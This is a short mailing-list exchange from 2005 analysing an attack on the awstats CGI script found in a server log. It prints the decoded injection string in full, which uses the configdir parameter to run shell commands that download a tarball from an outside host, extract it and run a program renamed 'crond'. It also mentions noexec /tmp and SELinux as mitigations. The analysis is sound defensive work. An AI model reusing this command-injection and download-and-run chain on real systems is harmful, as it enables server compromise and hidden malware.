On Fri, 2005-03-04 at 12:51 -0600, Brian Fahrlander wrote: > On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote: > > > Replace the url-encoded characters and you get: > > > > /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget > > zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv > > mech crond;export PATH=;crond;echo e_exp;%00 > > > > So the attacker has tricked the script into executing a set of shell > > commands, which include changing directory to /tmp, downloading a > > tarball from a Romanian site, extracting that tarball and then executing > > a program from the downloaded and extracted tarball, after renaming it > > to "crond" in an effort to disguise it. > > Damned fine research. Good job; I'm impressed. Thank you! Incidentally, some of the suggestions that came up earlier in this discussion, namely mounting /tmp with the noexec option and running SELinux, would have foiled *this particular* exploit of the awstats vulnerability. Paul. -- Paul Howarth <paul@xxxxxxxxxxxx>